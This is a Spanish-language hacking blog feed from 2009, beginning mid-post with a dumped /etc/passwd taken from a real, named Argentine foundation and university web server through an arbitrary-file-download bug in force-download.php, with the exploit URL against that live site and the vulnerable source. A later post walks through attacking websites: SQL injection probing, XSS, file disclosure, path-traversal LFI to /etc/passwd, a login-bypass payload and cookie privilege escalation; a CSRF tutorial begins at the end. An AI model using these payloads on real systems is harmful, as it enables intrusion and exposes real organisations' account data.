/&gt;nobody:x:65534:65534:nobody:/nonexistent:/bin/sh&lt;br /&gt;admin:x:1000:1000:,,,:/home/admin:/bin/bash&lt;br /&gt;identd:x:100:65534::/var/run/identd:/bin/false&lt;br /&gt;sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin&lt;br /&gt;telnetd:x:102:102::/nonexistent:/bin/false&lt;br /&gt;mysql:x:1002:100::/home/mysql:/bin/bash&lt;br /&gt;ftp:x:103:65534::/home/ftp:/bin/false&lt;br /&gt;alias:x:1003:1002::/var/qmail/alias:/sbin/nologin&lt;br /&gt;qmaild:x:1004:1002::/var/qmail:/sbin/nologin&lt;br /&gt;qmaill:x:1005:1002::/var/qmail:/sbin/nologin&lt;br /&gt;qmailp:x:1006:1002::/var/qmail:/sbin/nologin&lt;br /&gt;qmailq:x:1007:1003::/var/qmail:/sbin/nologin&lt;br /&gt;qmailr:x:1008:1003::/var/qmail:/sbin/nologin&lt;br /&gt;qmails:x:1009:1003::/var/qmail:/sbin/nologin&lt;br /&gt;vpopmail:x:1010:1004::/home/vpopmail:/sbin/nologin&lt;br /&gt;bind:x:104:101::/var/cache/bind:/bin/false&lt;br /&gt;favaloro:x:1014:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar:/bin/bash&lt;br /&gt;fundacion:x:1015:100::/usr/local/apache2/htdocs/www.fundacionfavaloro.org:/bin/bash&lt;br /&gt;posgrado:x:1016:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/posgrado:/bin/bash&lt;br /&gt;webmaster:x:1017:100::/usr/local/apache2/htdocs/:/bin/bash&lt;br /&gt;gmj:x:1001:100::/home/gmj:/bin/bash&lt;br /&gt;gaston:x:1018:0:GASTON:/home/gaston:/bin/bash&lt;br /&gt;itfurf:x:1019:1006::/usr/local/apache2/htdocs/it.furf.com.ar/:/bin/bash&lt;br /&gt;furf:x:1020:1007::/usr/local/apache2/htdocs/www.furf.com.ar:/bin/bash&lt;br /&gt;hobbit:x:1021:1008::/usr/local/hobbit/:&lt;br /&gt;backupfurf:x:1012:1012:,,,:/backup:/bin/bash&lt;br /&gt;pricai:x:1013:1013:,,,:/usr/local/apache2/htdocs/pricai.com.ar:/bin/bash&lt;br /&gt;ns1:x:1024:100::/home/ns1:&lt;br /&gt;cei:x:1026:1026:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/COMUNICA:/bin/bash&lt;br /&gt;congreso:x:1027:1027:,,,:/usr/local/apache2/htdocs/congresos.fundacionfavaloro.org:/bin/bash&lt;br /&gt;cye:x:1025:1025:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cye:/bin/bash&lt;br /&gt;proftpd:x:105:65534::/var/run/proftpd:/bin/false&lt;br /&gt;favaloroftp:x:1029:1029:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/ftp:/bin/bash&lt;br /&gt;ffavaloroftp:x:1030:1030:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/ftp:/bin/bash&lt;br /&gt;favaloro2:x:1031:50::/usr/local/apache2/htdocs/www2.favaloro.edu.ar:/bin/bash&lt;br /&gt;ossec:x:1034:1034::/var/ossec:/bin/false&lt;br /&gt;trimestral:x:1035:1035:,,,:/backup/trimestral:/bin/bash&lt;br /&gt;campanas:x:1036:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/campanas:/bin/bash&lt;br /&gt;dev:x:1022:1022:,,,:/usr/local/apache2/htdocs/dev.favaloro.edu.ar:/bin/bash&lt;br /&gt;cuidatucorazon:x:1011:1011:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cuidatucorazon:/bin/bash&lt;br /&gt;elvestuario:x:1023:1023:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/elvestuario:/bin/bash&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Y muchas cosas más…&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;0x04. ¿Dónde está el Bug?&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno, no sigo mas, ya que no hay mucho que hablar, pero es bueno para los programadores y pentesters donde está el bug,  pasaremos a descargar  un archivo interesante: http://www.favaloro.edu.ar/force-download.php?file=force-download.php&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;$filename = $_GET['file'];&lt;br /&gt;&lt;br /&gt;// required for IE, otherwise Content-disposition is ignored&lt;br /&gt;if(ini_get('zlib.output_compression'))&lt;br /&gt;  ini_set('zlib.output_compression', 'Off');&lt;br /&gt;&lt;br /&gt;// addition by Jorg Weske&lt;br /&gt;$file_extension = strtolower(substr(strrchr($filename,"."),1));&lt;br /&gt;&lt;br /&gt;if( $filename == "" ) &lt;br /&gt;{&lt;br /&gt;  echo "&amp;lt;html&amp;gt;&amp;lt;title&amp;gt;eLouai's Download Script&amp;lt;/title&amp;gt;&amp;lt;body&amp;gt;ERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;";&lt;br /&gt;  exit;&lt;br /&gt;} elseif ( ! file_exists( $filename ) ) &lt;br /&gt;{&lt;br /&gt;  echo "&amp;lt;html&amp;gt;&amp;lt;title&amp;gt;eLouai's Download Script&amp;lt;/title&amp;gt;&amp;lt;body&amp;gt;ERROR: File not found. USE force-download.php?file=filepath&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;";&lt;br /&gt;  exit;&lt;br /&gt;};&lt;br /&gt;switch( $file_extension )&lt;br /&gt;{&lt;br /&gt;  case "pdf": $ctype="application/pdf"; break;&lt;br /&gt;  case "exe": $ctype="application/octet-stream"; break;&lt;br /&gt;  case "zip": $ctype="application/zip"; break;&lt;br /&gt;  case "doc": $ctype="application/msword"; break;&lt;br /&gt;  case "xls": $ctype="application/vnd.ms-excel"; break;&lt;br /&gt;  case "ppt": $ctype="application/vnd.ms-powerpoint"; break;&lt;br /&gt;  case "gif": $ctype="image/gif"; break;&lt;br /&gt;  case "png": $ctype="image/png"; break;&lt;br /&gt;  case "jpeg":&lt;br /&gt;  case "jpg": $ctype="image/jpg"; break;&lt;br /&gt;  default: $ctype="application/force-download";&lt;br /&gt;}&lt;br /&gt;header("Pragma: public"); // required&lt;br /&gt;header("Expires: 0");&lt;br /&gt;header("Cache-Control: must-revalidate, post-check=0, pre-check=0");&lt;br /&gt;header("Cache-Control: private",false); // required for certain browsers &lt;br /&gt;header("Content-Type: $ctype");&lt;br /&gt;// change, added quotes to allow spaces in filenames, by Rajkumar Singh&lt;br /&gt;header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );&lt;br /&gt;header("Content-Transfer-Encoding: binary");&lt;br /&gt;header("Content-Length: ".filesize($filename));&lt;br /&gt;readfile("$filename");&lt;br /&gt;exit();&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Pueden notar que el archivo, no tiene validación protección “$filename = $_GET['file'];” y permite la descarga de cualquier archivo que se le ponga.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;0x05. Conclusión&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno termine mi tuto, de esta vulnerabilidad no hay mucho que hablar, pero es bueno un tutorial, para los que no tienen idea de esto y puedan ver la FUERZA de esta vulnerabilidad tan peligrosa y buena, ya que es muy fácil y no es necesario hacer algo especial como otros métodos.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Si quieren saber mas de este método, pueden buscar en google y también los links que voy a dejar abajo.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;0x06. Links interesantes&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Video de 0o_ZeuS_o0 sobre esta vulnerabilidad (En el tutorial dice “FULL PATH DISCLOSURE”, pero es “FULL SOURCE” un error de escritura jeje).&lt;br&gt;&lt;br /&gt;http://www.youtube.com/watch?v=3c-pojLunmY&amp;amp;feature=player_embedded&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Explotando Full Source Diclosure Bugueando "force-download.php" de Gothic-x.&lt;br&gt;&lt;br /&gt;http://gothicx.diosdelared.com/?coment=3762&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Màs de Full Source Diclosure de Gothic-x.&lt;br&gt;&lt;br /&gt;http://gothicx.diosdelared.com/?coment=3759&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Ilegalintrusion - #DDLR - #RE - GH - Seguridadblanca&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Autor: Zero Bits&lt;br&gt;&lt;br /&gt;Fecha: 15/11/09&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-9041994796466873258?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/9041994796466873258/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=9041994796466873258&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/9041994796466873258?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/9041994796466873258?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/arbitary-downloadfull-source-disclosure.html" title="Arbitary Download+Full Source Disclosure" /><author><name>Zero Bits</name><uri>http://www.blogger.com/profile/17744207739622178280</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="15367576321469896738" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;A0MDQns7eyp7ImA9WxBREUs.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-719697967121369644</id><published>2009-12-30T02:33:00.000-08:00</published><updated>2009-12-30T02:37:53.503-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-30T02:37:53.503-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><title>Como precaución</title><content type="html">debido a que ataques que se han hecho en contra de seguridadblanca para evitar pérdidas he hecho un backup de seguridadblanca oficial para que en el caso de que en algún momento seguridadblanca cayera puedan acceder a todo el contenido...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Click &lt;a href="http://seguridadblanca1.blogspot.com/"&gt;aquí&lt;/a&gt; para ir al backup&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mas vale previnir que lamentar...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-719697967121369644?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/719697967121369644/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=719697967121369644&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/719697967121369644?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/719697967121369644?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/como-precaucion.html" title="Como precaución" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CkcCRnY6eip7ImA9WxBREU0.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5480957175441453941</id><published>2009-12-29T07:13:00.000-08:00</published><updated>2009-12-29T07:21:07.812-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-29T07:21:07.812-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><title>mis Owneds ¬¬</title><content type="html">Bueno resulta que hubo un problemita con Jbyte pero ya está todo arreglado... disculpen los problemas ocacionados...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5480957175441453941?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/5480957175441453941/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5480957175441453941&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5480957175441453941?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5480957175441453941?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/mis-owneds.html" title="mis Owneds ¬¬" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CUAESXYzfyp7ImA9WxBSGEo.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-810386383531396431</id><published>2009-12-26T15:39:00.000-08:00</published><updated>2009-12-26T16:28:28.887-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-26T16:28:28.887-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><title>Explotando Bugs en webs Básico</title><content type="html">Muchos creen que para entrar a una web necesitasmos LAS TOOLS mas INCREIBLES del mundo pero realmente no necesitamos mucho, ahora les voy a describir una pequeña previa de como es el Dr.White en particular antes de atacar intentar ganar acceso a una web (WEB no ganar acceso a host ni vps ganar acceso a la web o explotar un bug...)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lo primero...&lt;br /&gt;&lt;br /&gt;Lo primero que hago es dejar la PC a un lado y voy a cojer un vaso con agua bien helada para que fluyan las ideas con claridad...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lo Segundo...&lt;br /&gt;&lt;br /&gt;Esta etapa es la previa a comenzar el ataque... vamos a abrir un bloc de ntoas que nos ordenará lo que busquemos... primero vamos a buscar todos los links que hayan en el index y buscaremos todos los links posibles... ahora todos los links que no contengan variables los pondremos dentro del bloc de notas... de esta forma:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Links sin Variables:&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/img/gallery/images.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/admin/admin.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/sitemap.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/textos/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora haremos lo mismo con las que si tengan variables...&lt;br /&gt;&lt;br /&gt;nuestro bloc de notas deberia quedar algo asi:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;links sin variables:&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/img/gallery/images.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/admin/index.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/search.php&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/textos/&lt;br /&gt;&lt;br /&gt;Links con variables&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/img/gallery/images.php?id=10&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/textos/index.php?topic=seguridad&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/downloads/index.php?archivo=packlenguaje.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora si ya tenemos todo un poco ordenado en primera lo que haremos será buscar formularios entre ellos cajas de texto... en lugares que no sea la administración... /admin/...&lt;br /&gt;&lt;br /&gt;en nuestra busqueda hemos encontrado un textbox con un boton en:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/search.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;cuando en el textbox ponemos seguridad nos pone algo como esto:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/search.php?text=seguridad&amp;privi=user&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;podemos analizar que hay dos variables... entonces lo pasamos a la lista de las webs con variables como última en la lista ahora si a analizar las variables...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/img/gallery/images.php?id=10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;vamos a ver si es vulnerable a algún ataque... provamos poniendo script alert hola pero no paso nada entonces decimos a sisi una sql injection ya que al parecer algo no deja explotar el xss entonces vamos y ponemos una comilla simple despues del 10&lt;br /&gt;&lt;br /&gt;y bien nos voto un error de sql, ahora ustedes pueden revisar la etiqueta &lt;a href="http://www.seguridadblanca.org/search/label/pen-test"&gt;pentest&lt;/a&gt; u otras segun lo que busquen para encontrar un tutorial de como explotar...&lt;br /&gt;&lt;br /&gt;ahora el siguiente link... &lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/textos/index.php?topic=seguridad&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lo primero que haremos será probar si es vulnerable a xss con un simple alert y probamos... y si si es vulneable... nosotros pusimos alert('hola') y nos mostro un msgbox con el contenido hola... ahora ya pueden buscar la etiqueta &lt;a href="http://www.seguridadblanca.org/search/label/Xss"&gt;Xss&lt;/a&gt; y ver todo lo que pueden explotar...&lt;br /&gt;&lt;br /&gt;ahora vamos a ver el tercer link:&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/downloads/index.php?archivo=packlenguaje.zip&lt;br /&gt;&lt;br /&gt;ese uno de los mas peligrosillos... vamos a ver si es vulnerable a File Disclosure...&lt;br /&gt;&lt;br /&gt;hay que poner otro archivo a ver si lo descarga...&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/downloads/index.php?archivo=index.php&lt;br /&gt;&lt;br /&gt;lo descargó... ahora si ya tenemos el index podemos ver a que cosa le hace requiere o requiere once para descargar archivos que nos sirvan para explotar mejor este bug...&lt;br /&gt;&lt;br /&gt;ahora el último...&lt;br /&gt;&lt;br /&gt;http://www.practicingtuintrusion.com/search.php?text=seguridad&amp;privi=user&lt;br /&gt;&lt;br /&gt;veamos... vamos a dejar la variable privi de lado... busquemos a ver que podemos hacer con seguridad y despues de un rato de buscar hemos dado con que poniendo text=index.php nos muestra un index.php eso se parece a un LFI entonces pongamos ../etc/passwd%        00 a ver que pasa... no pasa nada mmm pongamos entonces doble ../ ahora si nos muestra todo el passwd ya tenemos como explotar un LFI... ahora la variable privi vemos que dice user mmm yo creo que solo nos muestran los resultados que son para los users comunnes pero como somos curiosos pondremos privi=admin a ver que pasa y los resultados pasaron de ser 50 a 100 por dios ya tenemos mas que estudiar...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ahora el panel de administracion:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;vamos a ver que nos da para poner usuario y contraseña...&lt;br /&gt;&lt;br /&gt;vamos a probar con una simple sql injection para bypassear login...&lt;br /&gt;&lt;br /&gt;'or''='&lt;br /&gt;&lt;br /&gt;y vemos que no nos da el acceso entonces decimos... esto fue todo? mm no podemos buscar por donde sacar algo... y vemos que cuando nos ponemos privi=admin la cookie cambia entonces con el live http headers nos pondremos como cookie la que nos daba cuando estabamos en privi=admin... y hemos entrado por un error de privilegios que también está explicado en el blog en la etiqueta pentest... ahora esto es una especie de taxonimía muy básica...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;espero a provechen este tipo de enseñansa para que ustedes también usen algo de lo que les enseñé hoy...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-810386383531396431?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/810386383531396431/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=810386383531396431&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/810386383531396431?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/810386383531396431?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/explotando-bugs-en-webs-basico.html" title="Explotando Bugs en webs Básico" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;D0AMR34_eip7ImA9WxBSFko.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3109026549507771511</id><published>2009-12-24T09:28:00.000-08:00</published><updated>2009-12-24T09:29:46.042-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-24T09:29:46.042-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><title>Feliz Navidad Te desea SeguridadBlanca</title><content type="html">&lt;center style="color: rgb(255, 0, 0);"&gt;&lt;h1&gt;Feliz Navidad&lt;/h1&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Les Deseo Feliz navidad a todos los lectores de SeguridadBlanca y a Todo el mundo en general, espero la pasen muy bien en estas fechas, que la pasen con sus seres queridos y que no se les olvide de practicar todo lo que han aprendido y pues Feliz Navidad de nuevo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;De Camilo Galdos AkA Dr.White || Dédalo --&gt; SeguridadBlanca&lt;br /&gt;&lt;br /&gt;Para: El Mundo&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Con esta entrada no quiere decir que voy a dejar de escribir en el año o en el día igual escribiré pero quiero desearles una muy feliz navida...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;Saludos&lt;br /&gt;Dr.White&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3109026549507771511?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/3109026549507771511/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3109026549507771511&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3109026549507771511?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3109026549507771511?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/feliz-navidad-te-desea-seguridadblanca.html" title="Feliz Navidad Te desea SeguridadBlanca" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;DE8NSH08eCp7ImA9WxBSFUU.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-1820063963495522064</id><published>2009-12-23T08:18:00.000-08:00</published><updated>2009-12-23T08:48:19.370-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-23T08:48:19.370-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="csrf" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="cookie" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="xsrf" /><category scheme="http://www.blogger.com/atom/ns#" term="shadinessdark" /><title>[Tutorial] Vulnerabilidad CSRF  By ShadinessDark [Colaboracion de Zero Bits]</title><content type="html">Este tutorial fue hecho por un AMIGO en cual colabore y aca se los dejo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;b&gt;Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits&lt;/b&gt;&lt;/center&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;1.) Presentación &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;2.) Que es CSRF &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;3.) Quien descubrió la vulnerabilidad CSRF&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;4.) CSRF  y Xss&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;5) Robo de Cookies en XSS &amp;amp; CSRF (Diferencia) - Colaboracion de Zero Bits&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;6.) Testeando vulnerabilidad CSRF y programas el code vulnerable&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;7.) Sacando una conclusión a todo &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;8.) Como cuidar nuestra Web de este tipo de ataques&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;9.) Despedida&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;&lt;font color="red"&gt;1.) Presentación&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Primero que nada este tutorial va dedicado a mis amigos de BugDox  y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial&lt;br&gt;&lt;br /&gt;Para dar la diferencia de otros tutoriales que he visto en la red…&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;¿Por qué diferente? &lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados &lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;¿A que se debe este tutorial? &lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo &lt;br&gt;&lt;br /&gt;No es mi culpa que un Web Master no me haga caso ¿Verdad? &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Los saludos más especiales para mis compañeros:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;Zero Bits &lt;br&gt;&lt;br /&gt;KuTer &lt;br&gt;&lt;br /&gt;Jeferx &lt;br&gt;&lt;br /&gt;&lt;br /&gt;Darki113r &lt;br&gt;&lt;br /&gt;_84kur10_&lt;br&gt;&lt;br /&gt;Z1z30f &lt;br&gt;&lt;br /&gt;Kozmic.Kizz&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;2.) Que es CSRF &lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno como muchos quizás han leído en la wikipedia ya csrf representa a 